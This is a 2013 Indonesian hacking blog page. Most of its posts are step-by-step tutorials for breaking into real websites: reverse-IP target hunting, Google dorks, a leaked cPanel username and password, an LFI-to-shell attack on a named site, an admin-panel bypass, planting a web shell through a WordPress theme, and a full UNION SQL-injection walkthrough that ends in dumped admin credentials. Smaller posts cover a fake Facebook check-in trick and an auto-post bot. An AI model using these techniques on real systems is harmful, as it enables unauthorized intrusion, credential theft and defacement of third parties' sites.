Kamis, 01 Agustus 2013

0 Reverse IP

22.27 Under From Unknown
[0 Comment]

 - Salam kawan Googlemedianews, pada hari ini saya akan share kepada kawan
Metode Men-Hack Website dengan Reverse Ip.

Cara Hack Target Dengan Metode Reverse Ip membutuhkan sedikit waktu.
Pertama anda perlu target, misalkan http://herchcovitch.uol.com.br/. Maka untuk men-reverse Ip anda sekarang perlu ping target Anda seperti ini >> Buka CMD => http://herchcovitch.uol.com.br/


Versi 1. : Menggunakan CMD 

1.Pertama Anda Harus Mencari Suatu Website Di Google.co.id atau bing.com Liat contohnnya

2. Setelah kita dapat target  POC: http://herchcovitch.uol.com.br langsung kita Ping mengunakan CMD
  Quote:Pinging http://herchcovitch.uol.com.br/ [200.147.0.120] with 32 bytes of data:
dan ambil IP nya 200.147.0.120

3. Kemudian buka bing.com paste kode di bawah ini: Dan tulis dorknnya ip:200.147.0.120 php?id=




Versi 2  : Menggunakan http://www.yougetsignal.com/tools/web-sites-on-web-server/ 

1 .atau ambil IP nya paste ke link di bawah untuk melihat web yg satu server:

2.  Hasilnnya adalah 200.147.0.120 IP Dari Website http://herchcovitch.uol.com.br/

3. Setelah Itu Kita Buka DISINI Dan Search Menggunakan Dork ip:200.147.0.120 php?id=

 4. Disini Saya Memilih Website http://casadachris.uol.com.br/faca_materia.php?id=36  Sebagai Contoh
5. Selesai ^_^ Setelah Kita Dapat Websitennya Kita Inject Menggunakan SQLI,SQLMAP,Havj,Bactrack5 DLL


disana nanti akan terlihat website yang banyak dalam satu host/server dengan IP/WEbsite di atas.
Sekarang periksa semua situs satu per satu untuk menginjeksi sql injection.
Jika Anda mendapat rentan terhadap sql injection di website tsb, langsung saja mengupload shell, dan lakukan symlink 
Read More »

Selasa, 16 Juli 2013

1 Dork Cpanel

05.53 Under From Unknown
[1 Comment]
Selamat Malam Sob 
Hadow Ane Dateng Lagi Om Mau Shared Ilmu 
Mungkin Ilmu Ini udah Lama kOk Om dan Maaf Kalau baru Shared 

Oke Lagsung saja Om 

 Cpanel merupakan control panel web yang berguna untuk menyimpan/menambah/mengedit semua direktori dari suatu web. Nah, kita bisa mencari sebuah cpanel dari suatu web menggunakan bantuan dari google, yaitu menggunakan dork.



1. Ketik dork berikut ke kotak pencari google : <?php JConfig public $$offset user = filetype:txt

2. Dari hasil penesuluran, buka salah satu. Nanti anda akan melihat penampakan seperti ini





3. Coba perhatikan text ini

public $user = 'xtellkz_ujoom';
public $password = 'gfhjkm333';
Itu adalah username dan password cpanel dari suatu web. Kita tinggal cari saja itu cpanel dari web mana



4. Coba perhatikan text yang ini
public $mailfrom = 'info@shtrih.kz';
Berarti, cpanel yang kita temukan adalah cpanel dari web shtrih.kz. Kita tinggal cari tempat login untuk masuk ke cpanelnya. Biasanya www.site.com:2082

5. Masuklah menggunakan username dan password yang tadi kalian temukan

6. Jika berhasil masuk, silahkan deh di eksekusi webnya. Kalau mau di deface, tinggal masuk ke file manager, lalu ke public_html, edit isi dari file bernama index.php / index.html, isi dengan script deface kalian. Buka deh webnya www.site.com

NB : Cara ini tentunya sudah digunakan oleh banyak orang. Jadi kebanyakan web sudah pernah di deface dan pastinya sudah di patch oleh admin webnya. Jadi tidak semua username dan password yang kalian temukan itu valid. Tergantung keburuntungan anda jika menemukan yang valid.
Read More »

Senin, 15 Juli 2013

0 Daftar Masuk Palsu FB gaya iphone

05.20 Under From Unknown
[0 Comment]

Sebenarnya mudah untuk membuat Daftar Masuk Facebook (*ada gambar stempelnya) seperti Iphone, meski kita tak punya Iphone..
Bagaimana Langkah²nya?
Mari kita kulik bersama :ngacir: :ngacir:

Sebenarnya ketika kita akan masuk ke suatu tempat, Facebook akan menanyakan apakah kita izinkan berbagi lokasi kita atau tidak. Tapi mungkin peringatan/permintaan konfirmasi itu tidak akan muncul ketika kita pake koneksi lemot shared IP (kek koneksi model modem CDMA rumahan punya saya ini.
*Kapan kau perbaiki koneksimu ini ohh flexiiiii….  ) . Tapi tidak masalah, kita musti kereaktip dgn penuh kesabaran…
Mari kita kumpulkan alat dan bahan :
  1. Browser yg saya pake Mozilla Firefox
  2. Alat Utama adalah addons mozilla firefox yg bernama Geolocater
Lebih lengkapnya disini:
https://addons.mozilla.org/en-us/firefox/addon/geolocater.
Download addons tersebut, install lalu restart firefoxnya. Selanjutnya setting sesuai keinginan anda, kurang lebih seperti ini :
Setelah restart Firefox, klik Tools -> Geolocater -> Manage untuk membuka pengaturan Geolocaternya.
Geolocations -> New to create a geolocation.

Tulis tempat sesuai keinginan, geser pointer sesuai lokasi yang di tuju klik save location.

Selanjutnya, log in ke Facebook mobile website versi touch http://touch.facebook.com di Firefox, lalu klik Daftar Masuk

Hasilnya akan keluar banyak tempat Daftar masuk,seperti ini :

Klik Gambar untuk memperbesar
Misal kita pilih salah satu tempat seperti tersebut di atas,

Klik Gambar untuk memperbesar

dan Hasilnya :


*Tested on Firefox 4.0.1 and Geolocater 1.1.3
Read More »

0 Bot Facebook auto update random ayat

05.07 Under From Unknown
[0 Comment]
Oke mas mbak bro..disini saya akan mencoba berbagi sedikit tentang bot facebook via BB(ori) dengan token tentunya :) . Tapi tidak hanya auto update biasa, kali ini kita akan membuat random ayat sebagai status kita. Kita tidak perlu menulis random ayat tersebut, tetapi cukup mengambil dari widget random ayat milik mas Aryo Sanjaya di http://widgets.mahesajenar.com/ .Maaf  sebelumnya kepada mas Aryo karena belum meminta izin terlebih dahulu. Tapi saya yakin beliau tidak berkeberatan karena ini hanya sekedar untuk belajar. Okelah mari kita mulai pada cara kerjanya.

Pertama kita buat mirror random ayat untuk di tampilkan di status kita terlebih dahulu dengan metode Curl. Intinya kita akan membersihkan konten ayat dari http://www.mahesajenar.com/scripts/ayat.php kode lain :)
berikut code nya :
<?php

function bacaHTML($url){
// inisialisasi CURL
$data = curl_init();
// setting CURL
curl_setopt($data, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($data, CURLOPT_URL, $url);
// menjalankan CURL untuk membaca isi file
$hasil = curl_exec($data);
curl_close($data);
return $hasil;
}

$isine =  bacaHTML('http://www.mahesajenar.com/scripts/ayat.php');
$bersih=  explode('<b>', $isine);
$bersih= str_replace("document.write(", "", $bersih);
$bersih= str_replace("widget lain", "", $bersih);
$bersih= str_replace("<br/><br/><a href='http://widgets.mahesajenar.com/'></a>", "", $bersih);
$bersih= str_replace("</strong>", "", $bersih);
$bersih= str_replace("<br /><strong>", "", $bersih);
$bersih= str_replace(");", "", $bersih);
echo "$bersih[0]";

?>

Simpan dengan nama ayat.php lalu upload di hosting :) .
demo : http://www.marahmerah.com/ayat.php
Setelah random ayat bersih berhasil di buat, sekarang kita akan menampilkannya dalam auto status facebook. Disini saya akan menggunakan metode graph + token dari Blackberry, biar kelihatan keren sedikit :) .
Langkah 1 tentu saja kita ambil token Blackberry disini terlebih dahulu, untuk di masukkan dalam kode berikut :

<?php

$access_token = "kode token kamu";
$url = "https://graph.facebook.com/me/feed?method=POST";

$linx = "http://www.marahmerah.com/ayat.php";

$status = file_get_contents($linx);

$ch = curl_init();
$attachment =  array(   'access_token'  => $access_token,
'message'          => $status,
);

curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $attachment);
$result= curl_exec($ch);

curl_close ($ch);
?>
simpan dengan nama status.php ,lalu upload di hosting :)
Untuk cronjobs atau timer,mau berapa kali ditampilkan silakan di status, sesuaikan dengan hosting masing-masing..
Terimakasih, selamat mencoba :)

Read More »

Senin, 24 Juni 2013

0 Powerful Dork For SQLi [1]

10.25 Under From Unknown
[0 Comment]
Untuk para defacer. Saya akan bagikan dork untuk mencari vulnerable server. Dork ini akan mencari web yang vulnerable terhadap SQLi type UNION QUERY

dork : "The used SELECT statements have a different number of columns" inurl:product.php
Contoh :
Happy Hunting =)
Read More »

0 Vulnerable By Design [1-25]

10.12 Under From Unknown
[0 Comment]
Vulnerable by design? Ya, dilemahkan oleh design. Operasi-operasi sistem ini memiliki vulnerable yang unik, tidak semua peretas dapat menemukan celah keamanan operasi sistem ini. Bahkan saya ragu pada peretas yang bermulut besar dapat menemukan celah kemanan operasi sistem ini.

Lalu, untuk apa operasi-operasi sistem ini dibuat? Tentu saja untuk melatih para penetration tester dalam mengasah kemampuan menganalisa dan mencari vulnerability sebuah operasi sistem. Tujuan akhir para penetration tester yang menguji OS ini adalah untuk mendapatkan hak akses (privilege) tertinggi dalam OS ini. Mengingat OS ini berbasis linux, maka anda selaku penetration tester harus dapat mendapatkan akun root dalam OS ini. Mudahkah? Beberapa dari OS ini mudah di retas, bahkan diretas hingga ke akarnya (root). 
Dalam blog ini, beberapa jenis Vulnerable by Design telah dipaparkan, sebut saja kioptrix level 1, kioptrix level 3, kioptrix level 4, de ice, dan banyak lagi. Salah satu rahasia memiliki kemampuan analisa tinggi, adalah mencoba tantangan ini, tantangan untuk memperoleh root dalam box box vulnerable ini. Percayalah, ketika anda mendapatkan root dari salah satu vulnerable by design, anda akan langsung mendapatkan banyak ilmu mengenai sistem keamanan dalam UNIX server dan non-server.
Kemampuan menganalisan vulnerability saya berawal dari proses ini, dimana kemampuan penguasaan tools backtrack benar-benar diuji dalam usaha mendapatkan root dalam box ini. Dan satu hal yang saya pelajari dari rooting box ini:
"Jangan bergantung pada segelintir tools yang dimiliki oleh backtrack dalam meretas satu system, anda tidak tau betapa berbahayanya mereka ketika semua tools bahu membahu mengikis pertahanan sebuah system. Tingkat keberhasilan anda bergantung pada banyaknya tools yang dapat anda gunakan dalam peretasan sebuah system."
Berikut saya akan membagi beberapa vulnerable by design yang bisa anda coba untuk mempertajam kemampuan penetration testing anda.
1. De - ICE
Level yang tersedia : Level 1 - Disk 1 , Level 1 - Disk 2, Level 1 - Disk 3, Level 2 - Disk 1
2. Hackademic
Level yang tersedia : Level 1 (Box 1), Level 2 (Box 2)
3. Holynix
Level Yang tersedia : Level 1, Level 2
4. Kioptrix
Level yang tersedia : Level 1 , Level 2, Level 3, Level 4
5. Metasploitable
Level yang tersedia : Level 1 , level 2
6. NcN 2011
Level yang tersedia : Level 1 , Level 2, Level 3, Level 4, Level 5, Level 6
7. NETinVM
Level yang tersedia : Level 1, Level 2, Level 3
8. pWnOS
Level yang tersedia : Level 1
9. RuCTFE
Level yang tersedia : Level 1
10. vulnimage
Level yang tersedia : Level 1
11. BadStore
Level yang  tersedia : Level 1
12. BodeIT
Level yang teredia : Level 1
13. Damn Vulnerable Web App
Level yang tersedia : Level 1
14. Hacme
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5
15. Hackxor
Level yang tersedia : Level 1
16. LAMPSecurity
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5, Level 6
17. Moth
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5, Level 6
18. Mulitilidae
Level yang tersedia : Level 1 (v 1.5)
19. OWASP Broken Web Application Project
Level yang tersedia : Level 1 (v 0.92rc1)
20. OWASP Hackademic Challenge Project 
Level yang tersedia : Level 1
21. OWASP Insecure Web App Project
Level yang tersedia : Level 1
22. OWASP Vicnum
Level yang tersedia : Level 1 (v 1.4)
23. OWASP WebGoat
Level yang tersedia : Level 1 
24. PuzzleMail
Level yang tersedia : 1
25. SecurityBench 
Level yang tersedia : Level 1 (Normal), Level 2 (Micro)
Ada lebih dari 50 OS Vulnerable yang pernah dibuat untuk dijadikan sarana belajara para peserta Hackademic, dan para penetration tester. Untuk saat ini, saya akan membagikan 25 OS terlebih dahulu. Beberapa dari OS diatas pernah diulas di dalam blog ini, jika anda ingin mencari tau apa yang harus anda lakukan untuk merooting OS ini, ada baiknya anda menggunakan vitur search pada blog ini. Good luck, and have fun. (=
Read More »

Sabtu, 15 Juni 2013

0 salah satu bug CMS

08.22 Under From Unknown
[0 Comment]


mau berbagi sedikit tentang salah satu CMS (nama CMSnya aku g tau,hi...hi..hi)
bug yg sangat fatal.di cms terdapat suatu bug yg terletak pada script content.php
dan pada module usernya.
ok let's begin
1. searching target dengan dork "allinurl:media.php?module="
2. tentukan target.jika sudah dapat lanjut ke berikutnya
3. tester pertam yaitu mengetahui page adminnya dengan menambakan dir admin di belakang target
misal : http://target.com/admin

4. setelah kebuka,lanjut keberikutnya yaitu dengan langsung menuju ke content module usernya.
dengan menambahkan content.php?module=user
misal : http://target.com/admin/content.php?module=user

5. nah kan kalo kebuka.. di situ kita bisa edit user or admin atau jg bisa namabahin lagi user loginnya
tuh... jadi terserah anda mau edit ato mau add user/tambah user.

nah untuk langkah selanjutnya terserah kalian....

nah kalo yg mau berbentuk video....
silahkan download disini
Read More »

0 LFI dan Upload Shell via tamper data

08.21 Under From Unknown
[0 Comment]
assalamualaikum wr. wb.

saya hanya ingin berbagi apa yang saya ketahui.sekarang saya akan berbagi tentang serangan web dengan tehnik LFI
dan cara upload shell dengan Tamper data
kalian persiapkan target atao cari target dengan dork yg kalian miliki masing2
kalo dah daptin target selanjutnya :
1. cek target kalian apakah vuln LFI dengan ../ jika keluar error maka web target bisa kita serang dengan method LFI
misal disini saya menggunakan target http://www.droonet.com/index.php?option=com_photobattle&view=
jadi hasilnya kaya gini http://www.droonet.com/index.php?option=com_photobattle&view=../
2. tambahin dengan etc/passwd ini untuk mencari letak file passwd, jika masih keluar error maka kita tambahin direktori
ato ../ sampe g keluar error ato file passwd bisa di eksekusi.
jadi hasilnya kaya gini :
http://www.droonet.com/index.php?option=com_photobattle&view=../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../etc/passwd <--- dah g error lagi

3. bila sudah tidak keluar pesan error lagi ato file passwd dah bisa di kesekusi maka langkah selanjutnya kita ubah etc/passwd
dengan proc/self/environ. ini untuk mengecek apa file environ apa bisa di akses ato tidak.jadi hasilnya kaya ini
http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../proc/self/environ

jika sukses ato environ bisa di akses maka akan keluar pesan seperti pada gambar :


4. kalo sukses,saatnya kita upload shell via tamper data,kalo belum pnya silahkan di download or install di
https://addons.mozilla.org/en-US/firefox/addon/966
5. kalo udah terpasang,selanjutnya buka tamper datanya yg ada di tools - Tamper Data,kemudian klik start tamper
6. kemudian buka lagi url yg di atas
http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../proc/self/environ
7. kemudian muncul dialog box seperti pada gambar.klik az tamper,kemudian akan muncul jendela baru lagi

8. nah di jendela baru ubah User-Agent menjadi script injection shell. scriptnya seperti ini

jika kalian pny link sendiri tempat menyimpan shell,pake az pny kalian masing2.jika lom pnya silahkan pake itu az
gak apa2.

9. klik ok,maka mozilla yg di url http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../proc/self/environ
akan ngeloading,kalo dah selesai loading,kalo keluar forbidden,maka proses penguploadan shell gagal.stop tamper datanya.
10. sekarang saatnya kita coba buka shellnya,shell akan berada di
http://target.com/nama shell.php
jadi seperti ini
http://www.droonet.com/shell.php

jika shell ke eksekusi maka langkah selanjutnya terserah kalian.
untuk yg masih bingun silahkan download video tutornya disini

thenk's
semoga bermanfaat dan berguna..

wassalam
Read More »

0 How Upload Shell in wordpress

08.20 Under From Unknown
[0 Comment]
Assalamualaikum wr. Wb.



Cara upload shell di wordpress g juh beda dengan upload shell di joomla. Untuk cara upload shell di wordpress yang saya pake adalah dengan cara install theme wordpress. Jadi kalian membutuhkan pack theme wordpress,jadi searching dulu di google,banyak tuch. Setelah dapet themenya,mari kita masuk ke page admin target wordpress.



1. masuk ke apperaeance – klik add new,



2. kemudian akan muncul sebuah page untuk melakukan upload,sebelum kalian upload,kalian edit salah satu dari file yg ada di pack theme yg kalian miliki,misal file index.php kita edit,kita ubah script index.php menjadi script shell kita.kemudian kalian save dan pack lagi dengan zip.
3. upload dan install file pack themenya.tunggu sekejap.kalo dah keluar pesan sukses maka berarti sukse,tinggal kita cari tempat shell kita berada di mana.
4. untuk tempat shell berada,karena theme wordpress biasanya berda pada public_html/wp-content/themes/nama direktori/nama file yang kita edit tadi.
Misal nama direktorinya mystique
Dan nama filenya index.php
So hasilnya kurang lebih sepeti ini “http://target.com/wp-content/theme/mystique/index.php”


Terus tekan enter , jreeeeeeeeeeeennnnngggggg shell kebuka di hadapan kita,dan kita bisa leluasa mau ngapain az di shell ke web target.
buat kalian yang bingung dan males baca tulisan ini bisa juga liatvideonya disini
untuk yang males nyari2 theme bisa di ambil disini yang sudah saya edit.
Selamat menoba dan semoga tulisan ini bermanfaat dan berguna

Thenk’s
Read More »

0 SQL Injection

08.18 Under From Unknown
[0 Comment]
untuk para master2 jangan di ketawain nich artikel cupu dari dopunk.
sekarang saya mau membagi sedikit apa itu sql Injection??temen-temen pastinya dah sering dengar istilah ini,istilah ini sangat merakyat di kalangan dunia perkomputeran.apa sich SQL?SQL yaitu Structure Query Language yg maksudnya adalah suatu bahasa pemorgraman yang berfungsi untuk menyimpan data-data berupa string,integer dan lain-lain.atau dengan kata kerennya yaitu database (tempat ato gudang data :D).SQL fungsinya sama dengan dbase yg lain seperti microsoft acces,oracle dll.nah untuk SQL injection sendiri adalah suatu tehnik dimana kita akan mencuri data-data penting di dalam sql.nah untuk cara-caranya sebagai berikut ,
pertama-tama pastinya kita harus mempunyai target yang mau di inject sqlnya.nah untuk mempermudah kita mencari target kita gunain mesin search engine google az.dengan bantuan keyword di bawah ini :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?id=
inurl:play_old.php?id=
inurl:newsitem.php?id=
inurl:readnews.php?id=
inurl:top10.php?id=
inurl:historialeer.php?id=
inurl:reagir.php?id=
inurl:Stray-Questions-View.php?id=
inurl:forum_bds.php?id=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?id=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=


ketikkan keyword di atas di google (pilih salah satu)kemudian enter.
nah kemudian muncullah target-target yang akan kita buat uji coba.
kedua,setelah kalian menetapkan target,maka untuk langkah selanjutnya melakukan test pada target tsb apa ada bug (error or kesalahan) dalam sqlnya.gimana caranya?caranya dengan menggunakan tanda singgle quote (') atau tanda petik satu.jadi hasilnya kaya gini kurang lebih :
htttp://target.com/products.php?id=1'

ketiga,jika dengan pentest tsb keluar pesan error di target.maka target tsb bisa kita inject sqlnya atao bahasa kerennya target itu vuln (mode on : so tau).maka untuk langkah selanjutnya kita akan mengecek berapa banyak kolom yg terdapat dalam sql tsb,dengan menggunakan perintah "order by" seperti contoh berikut :
http://target.com/products.php?id=-1 order by 1

kita cek kolomna dengan mengubah angka di belakang order by.sampe di target mengeluarkan pesan error lagi,contoh:
http://target.com/products.php?id=-1
order by 5

nah di saat pada angka 5 udah ada pesan error makan kita berhenti di situ.

keempat,setelah kita mengetahui berapa banyak kolom yg ada di sql tsb,waktunya kita melihat kolom berapa az yg ada isinya,dengan menggunakan perintah "union select".contoh:
http://target.com/products.php?id=-1 union select 1,2,3,4,5


kelima,jika di target mengeluarkan angka,misal keluar angka 2,kita coba liat isinya di angka 2.pertama kita liat versinya dulu ya,kalo versi 4 maka kita bahas di tahap selanjutnya ato kalian googling sendiri ya :D.untuk cara melihat versi berapakah sql yg di pake di target maka kita gunakan perintah "version()".contoh :
http://target.com/products.php?id=-1 union select 1,version(),3,4,5


keenam,nah setelah mengetahui versi sql kita lanjut melihat isinya,gimana caranya?caranya yaitu dengan menggunakan "group_concat(table_name)" dan di angka paling akhir kita kasih embel2 "from information_schema.tables".contoh :
http://target.com/products.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables

setelah information isi dari kolom 2 keluar,maka waktunya kita memilih dari isi itu yg begitu penting.

ketujuh,setelah menetapkan memilih salah satu isi,maka langkah selanjutnya kita mengkonversi string tsb menjadi hexa.misal kita memilih "admin" maka kita konversi ascii "admin" ke hexa sehingga menjadi 61646D696E.

kedelapan,langkah selanjutnya kita masuk lebih dalem,yaitu kitamelihat isi dari admin.dengan perintah "group_concat(column_name" dan di belakang angka terakhir di kasih embel2 "from informaion_schema.columns where table_name=0x61646D696E".jadi sehingga menjadi kaya gini kurang lebih :
http://target.com/products.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E


kesembilan,setelah hasil itu keluar maka langkah terakhir yaitu melihat lagi lebih dalem isi dari admin.misal dari hasil di atas keluar id,username,pass.maka kita keluarin isi dari hasil ketiga tersebut.

terakhir,cara ngeluarin ato mau isi lihat dari id,username,pass maka kita guanakan perintah : "group_concat(id,0x3a,username,0x3a,pass)" di belakang angka terakhir kasih perintah "from admin"
jadi seperti ini kurang lebih :
http://target.com/products.php?id=-1 union select 1,group_concat(id,0x3a,username,0x3a,pass),3,4,5 from admin


nah dengan perintah di atas kita sudah mendapatkan user dan pass suatu target.gampang kan??

selamat mencoba az ya..

semoga berguna
thenk's
Read More »